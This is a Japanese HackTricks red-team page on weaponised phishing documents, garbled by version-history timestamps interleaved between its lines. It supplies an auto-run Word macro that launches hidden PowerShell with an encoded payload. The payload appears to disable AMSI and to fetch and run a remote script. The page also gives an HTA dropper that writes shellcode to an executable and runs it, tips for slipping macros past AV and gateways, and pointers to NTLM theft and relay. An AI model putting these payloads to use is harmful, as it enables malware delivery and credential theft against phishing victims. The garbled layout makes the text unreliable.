2024-02-07 05:47:12 +00:00
# フィッシングファイル&ドキュメント
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 01:39:37 +00:00
< summary > < strong > **htARTE (HackTricks AWS Red Team Expert)**< / strong > を使って、**ゼロからヒーローまでAWSハッキングを学ぼう**< strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 01:39:37 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASS& HackTricksスウェグ** ](https://peass.creator-spring.com )を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## オフィスドキュメント
2022-09-03 09:30:58 +00:00
2024-02-09 01:39:37 +00:00
Microsoft Wordはファイルを開く前にファイルデータの検証を行います。データ検証は、OfficeOpenXML標準に対するデータ構造の識別の形で行われます。データ構造の識別中にエラーが発生した場合、分析されているファイルは開かれません。
2020-12-21 17:07:56 +00:00
2024-02-08 03:59:37 +00:00
通常、マクロを含むWordファイルは`.docm`拡張子を使用します。ただし、ファイルの拡張子を変更しても、マクロの実行機能を保持することができます。\
2024-02-09 01:39:37 +00:00
たとえば、RTFファイルは設計上マクロをサポートしていませんが、RTFに名前が変更されたDOCMファイルはMicrosoft Wordによって処理され、マクロの実行が可能になります。\
2024-02-07 05:47:12 +00:00
同じ内部構造とメカニズムがMicrosoft Office Suiteのすべてのソフトウェア( Excel、PowerPointなど) に適用されます。
2020-12-21 17:07:56 +00:00
2024-02-09 01:39:37 +00:00
次のコマンドを使用して、いくつかのOfficeプログラムによって実行される拡張子を確認できます:
2020-12-21 17:07:56 +00:00
```bash
assoc | findstr /i "word excel powerp"
```
2023-07-07 23:42:27 +00:00
### 外部画像の読み込み
2020-12-21 17:07:56 +00:00
2024-02-07 05:47:12 +00:00
Go to: _挿入 --> クイックパーツ --> フィールド_ \
2024-02-09 01:39:37 +00:00
_**カテゴリ**: リンクと参照、**フィールド名**: includePicture、**ファイル名またはURL**:_ http://\<ip>/whatever
2020-12-21 17:07:56 +00:00
2022-05-01 13:25:53 +00:00
![](< .. / . . / . gitbook / assets / image ( 316 ) . png > )
2020-12-21 17:07:56 +00:00
2024-02-07 05:47:12 +00:00
### マクロバックドア
2020-12-21 17:07:56 +00:00
2024-02-09 01:39:37 +00:00
文書から任意のコードを実行するためにマクロを使用することが可能です。
2022-09-03 09:30:58 +00:00
2024-02-07 05:47:12 +00:00
#### 自動読み込み関数
2022-09-03 09:30:58 +00:00
2024-02-07 05:47:12 +00:00
一般的な関数ほど、AVがそれらを検出する可能性が高くなります。
2022-09-03 09:30:58 +00:00
* AutoOpen()
* Document\_Open()
2024-02-07 05:47:12 +00:00
#### マクロコードの例
2022-09-03 09:30:58 +00:00
```vba
2021-10-25 23:03:11 +00:00
Sub AutoOpen()
2023-07-07 23:42:27 +00:00
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
2021-10-25 23:03:11 +00:00
End Sub
```
2022-09-03 09:30:58 +00:00
```vba
Sub AutoOpen()
2023-07-07 23:42:27 +00:00
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
2022-09-03 09:30:58 +00:00
End Sub
```
```vba
2020-12-21 17:07:56 +00:00
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
2023-07-07 23:42:27 +00:00
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
2020-12-21 17:07:56 +00:00
```
2022-09-03 09:30:58 +00:00
```vba
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell < beacon line generated >
```
2023-07-07 23:42:27 +00:00
#### メタデータの手動削除
2020-12-21 17:07:56 +00:00
2024-02-07 05:47:12 +00:00
**ファイル > 情報 > ドキュメントの検査 > ドキュメントの検査** に移動し、Document Inspector が表示されます。**検査** をクリックし、**ドキュメントのプロパティと個人情報** の隣にある **すべて削除** をクリックします。
2022-09-03 09:30:58 +00:00
2023-07-07 23:42:27 +00:00
#### ドキュメントの拡張子
2022-09-03 09:30:58 +00:00
2024-02-07 05:47:12 +00:00
作業が完了したら、**保存形式** ドロップダウンから、**`.docx`** から **Word 97-2003 `.doc`** に形式を変更します。\
2024-02-09 01:39:37 +00:00
これは、**マクロを `.docx` 内に保存できない** ためです。また、マクロが有効化された ** `.docm` ** 拡張子には **スティグマ** があります(たとえば、サムネイルアイコンには大きな `!` が表示され、一部のウェブ/メールゲートウェイが完全にブロックします)。そのため、この **レガシーの `.doc` 拡張子が最良の妥協策** です。
2022-09-03 09:30:58 +00:00
2023-07-07 23:42:27 +00:00
#### 悪意のあるマクロ生成ツール
2022-09-03 09:30:58 +00:00
* MacOS
2023-07-07 23:42:27 +00:00
* [**macphish** ](https://github.com/cldrn/macphish )
* [**Mythic Macro Generator** ](https://github.com/cedowens/Mythic-Macro-Generator )
2022-09-03 09:30:58 +00:00
2024-02-07 05:47:12 +00:00
## HTA ファイル
2022-09-03 09:30:58 +00:00
2024-02-07 05:47:12 +00:00
HTA は、**HTML と VBScript、JScript などのスクリプト言語を組み合わせた Windows プログラム** です。これは、ブラウザのセキュリティモデルの制約なしに ** "完全に信頼された" アプリケーションとして実行** されるユーザーインターフェースを生成します。
2022-09-03 09:30:58 +00:00
2024-02-09 01:39:37 +00:00
HTA は ** `mshta.exe` ** を使用して実行され、通常は **Internet Explorer と一緒にインストール** されるため、**`mshta` は IE に依存** しています。したがって、IE がアンインストールされている場合、HTA は実行できません。
2022-12-03 17:35:56 +00:00
```html
< -- ! Basic HTA Execution -- >
< html >
2023-07-07 23:42:27 +00:00
< head >
< title > Hello World< / title >
< / head >
< body >
< h2 > Hello World< / h2 >
< p > This is an HTA...< / p >
< / body >
< script language = "VBScript" >
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function
Pwn
< / script >
2022-12-03 17:35:56 +00:00
< / html >
```
2022-09-03 09:30:58 +00:00
```html
2022-09-09 14:57:43 +00:00
< -- ! Cobal Strike generated HTA without shellcode -- >
2022-09-03 09:30:58 +00:00
< script language = "VBScript" >
2023-07-07 23:42:27 +00:00
Function var_func()
var_shellcode = "< shellcode > "
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("& H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
var_func
self.close
2022-09-03 09:30:58 +00:00
< / script >
```
2023-07-07 23:42:27 +00:00
## NTLM認証の強制
2020-12-21 17:07:56 +00:00
2024-02-08 03:59:37 +00:00
**リモートでNTLM認証を強制する**方法はいくつかあります。たとえば、ユーザーがアクセスするであろう電子メールやHTMLに**見えない画像**を追加したり( たとんHTTP MitM? ) 、または被害者に**フォルダを開くだけで認証をトリガーするファイルのアドレス**を送信することができます。
2022-09-03 09:30:58 +00:00
2024-02-09 01:39:37 +00:00
**これらのアイデアやその他の情報は、以下のページで確認してください:**
2022-09-03 09:30:58 +00:00
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md ](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md )
{% endcontent-ref %}
{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %}
[places-to-steal-ntlm-creds.md ](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md )
{% endcontent-ref %}
2023-07-07 23:42:27 +00:00
### NTLMリレー
2022-09-03 09:30:58 +00:00
2024-02-09 01:39:37 +00:00
ハッシュや認証情報を盗むだけでなく、**NTLMリレーアタックも実行**できることを忘れないでください:
2021-08-10 14:04:23 +00:00
2023-07-07 23:42:27 +00:00
* [**NTLMリレーアタック** ](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack )
* [**AD CS ESC8( 証明書へのNTLMリレー) ** ](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8 )
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 01:39:37 +00:00
< summary > < strong > ゼロからヒーローまでのAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-09 01:39:37 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
2024-02-07 05:47:12 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASS& HackTricksスウェグ** ](https://peass.creator-spring.com )を手に入れましょう
2024-02-09 01:39:37 +00:00
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
2022-04-28 16:01:33 +00:00
< / details >